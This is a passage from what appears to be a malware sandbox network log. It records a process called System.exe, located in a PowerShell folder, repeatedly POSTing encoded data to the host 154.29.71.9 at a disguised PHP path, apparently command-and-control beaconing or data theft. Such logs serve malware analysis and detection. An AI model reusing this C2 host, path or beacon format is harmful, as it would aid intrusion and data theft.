                                                                                                    Jan 4, 2025 14:52:50.817687988 CET2600OUTData Raw: 59 51 5d 5b 5b 54 58 50 5b 59 5a 55 50 5e 5b 56 56 57 54 48 52 51 52 5c 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: YQ][[TXP[YZUP^[VVWTHRQR\U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9X.>%[&8===++3$+;.3*U6=3V!8*=#1 $.?"Y ']/<
                                                                                                    Jan 4, 2025 14:52:51.137214899 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:52:51.271933079 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:51 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    41192.168.2.449782154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:52:51.401971102 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2596
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:52:51.754359007 CET2596OUTData Raw: 59 59 5d 5f 5e 5c 58 5c 5b 59 5a 55 50 58 5b 5b 56 53 54 40 52 51 52 51 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: YY]_^\X\[YZUPX[[VST@RQRQU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9[.>9Z&;==$Z(-#S']0[/#-! 5^)P>4C20<]-/"Y ']/


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    42192.168.2.449783154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:52:51.916843891 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 1856
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:52:52.270006895 CET1856OUTData Raw: 59 58 58 5c 5e 59 58 5c 5b 59 5a 55 50 5f 5b 51 56 5c 54 45 52 5b 52 5d 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: YXX\^YX\[YZUP_[QV\TER[R]U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\:8>1Q?=;+>7T3 Z83"P!.;689)X7$#?:?"Y ']/
                                                                                                    Jan 4, 2025 14:52:52.433855057 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:52:52.572681904 CET349INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:52 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 39 38 0d 0a 0f 11 22 11 32 39 0f 0f 25 03 23 0f 2e 02 39 50 2b 23 21 1d 38 3e 28 5a 2b 29 37 14 3b 23 3f 10 3e 3b 36 43 29 32 3c 0b 26 11 30 59 2b 36 20 51 03 12 27 11 26 5f 3a 59 2b 23 36 04 2e 3d 2b 1a 21 31 33 58 26 29 32 59 22 13 04 03 31 2f 35 1f 3e 11 25 51 2e 2e 3c 06 2e 0a 2c 54 2b 05 23 55 0b 1f 26 0e 24 1f 34 57 31 3b 34 10 29 30 28 5e 3c 04 05 57 20 14 27 01 25 00 32 10 27 1f 21 1f 30 32 2e 00 24 30 25 5a 22 10 2b 59 27 3a 2e 53 2e 01 2d 57 00 3d 59 4c 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 98"29%#.9P+#!8>(Z+)7;#?>;6C)2<&0Y+6 Q'&_:Y+#6.=+!13X&)2Y"1/5>%Q..<.,T+#U&$4W1;4)0(^<W '%2'!02.$0%Z"+Y':.S.-W=YL0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    43192.168.2.449784154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:52:52.351747036 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2596
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:52:52.707581997 CET2596OUTData Raw: 59 58 58 5b 5b 5b 58 50 5b 59 5a 55 50 58 5b 51 56 55 54 44 52 5b 52 5f 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: YXX[[[XP[YZUPX[QVUTDR[R_U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9,%[&(=>[#?=0 Z82W5.<"&(>713Y."Y ']/,
                                                                                                    Jan 4, 2025 14:52:52.869076014 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:52:53.002388000 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:52 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    44192.168.2.449785154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:52:53.131720066 CET371OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Jan 4, 2025 14:52:53.488770962 CET2600OUTData Raw: 59 50 5d 5f 5b 5d 58 5c 5b 59 5a 55 50 5d 5b 56 56 50 54 43 52 59 52 5c 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: YP]_[]X\[YZUP][VVPTCRYR\U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9_,=9Z%;1><;T';#, "!-;Q5")=<A2[-"Y ']/0
                                                                                                    Jan 4, 2025 14:52:53.757419109 CET225INHTTP/1.1 100 Continue
                                                                                                    Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 61 74 2c 20 30 34 20 4a 61 6e 20 32 30 32 35 20 31 33 3a 35 32 3a 35 33 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 0d 0a 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Sat, 04 Jan 2025 13:52:53 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-Encoding4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    45192.168.2.449786154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:52:53.883260965 CET371OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Jan 4, 2025 14:52:54.238763094 CET2600OUTData Raw: 59 5b 5d 5b 5b 5f 58 52 5b 59 5a 55 50 5a 5b 5b 56 50 54 47 52 58 52 5c 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: Y[][[_XR[YZUPZ[[VPTGRXR\U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9,.-&9>Z+$$;+/#:!0":*>#2$\:?"Y ']/,
                                                                                                    Jan 4, 2025 14:52:54.536575079 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:52:54.670201063 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:54 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    46192.168.2.449787154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:52:55.063715935 CET371OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Jan 4, 2025 14:52:55.410648108 CET2600OUTData Raw: 5c 5a 58 5c 5b 5d 58 54 5b 59 5a 55 50 51 5b 52 56 52 54 41 52 5e 52 5c 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: \ZX\[]XT[YZUPQ[RVRTAR^R\U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\:8>$(*Q=-(3T3]/83!8!(6=8A27:"Y ']/
                                                                                                    Jan 4, 2025 14:52:55.589378119 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:52:55.724050045 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:55 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    47192.168.2.449788154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:52:55.852781057 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:52:56.207518101 CET2600OUTData Raw: 5c 59 58 5b 5b 5e 5d 53 5b 59 5a 55 50 5a 5b 57 56 51 54 47 52 5d 52 5c 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: \YX[[^]S[YZUPZ[WVQTGR]R\U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9_/>%8)(=+'+<Y.#W![8!-P)>%U -?"Y ']/,
                                                                                                    Jan 4, 2025 14:52:56.388315916 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:52:56.521966934 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:56 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    48192.168.2.449789154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:52:56.648761034 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:52:57.004374027 CET2600OUTData Raw: 5c 5c 58 5e 5e 58 5d 53 5b 59 5a 55 50 5e 5b 55 56 5c 54 42 52 59 52 58 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: \\X^^X]S[YZUP^[UV\TBRYRXU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9.->28*8X( '8;,"=<"(>=. @&Z."Y ']/<
                                                                                                    Jan 4, 2025 14:52:57.166953087 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:52:57.294301033 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:57 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    49192.168.2.449790154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:52:57.591888905 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 1852
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    50192.168.2.449791154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:52:57.796232939 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:52:58.145107985 CET2600OUTData Raw: 59 58 58 51 5b 5b 58 5c 5b 59 5a 55 50 50 5b 52 56 55 54 47 52 5d 52 51 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: YXXQ[[X\[YZUPP[RVUTGR]RQU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9X8>_%8*.?(0$$_,!'6)8D%3;:/"Y ']/
                                                                                                    Jan 4, 2025 14:52:58.322021008 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:52:58.452106953 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:58 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    51192.168.2.449792154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:52:58.585405111 CET371OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Jan 4, 2025 14:52:58.943226099 CET2600OUTData Raw: 5c 59 58 5c 5e 5e 58 52 5b 59 5a 55 50 5b 5b 5a 56 5c 54 41 52 5f 52 5f 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: \YX\^^XR[YZUP[[ZV\TAR_R_U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9^,)Y&!==?(=/0+/6=+W#;%V*X4@23\9"Y ']/(
                                                                                                    Jan 4, 2025 14:52:59.121826887 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:52:59.258086920 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:59 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    52192.168.2.449793154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:52:59.480422974 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2592
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:52:59.832882881 CET2592OUTData Raw: 59 59 58 5a 5b 54 5d 53 5b 59 5a 55 50 58 5b 53 56 5d 54 49 52 5e 52 51 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: YYXZ[T]S[YZUPX[SV]TIR^RQU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\:/=&U>8Y<+T0;<_/ & =/!T(.1#(/?"Y ']/
                                                                                                    Jan 4, 2025 14:52:59.998016119 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:00.126226902 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:59 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    53192.168.2.449795154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
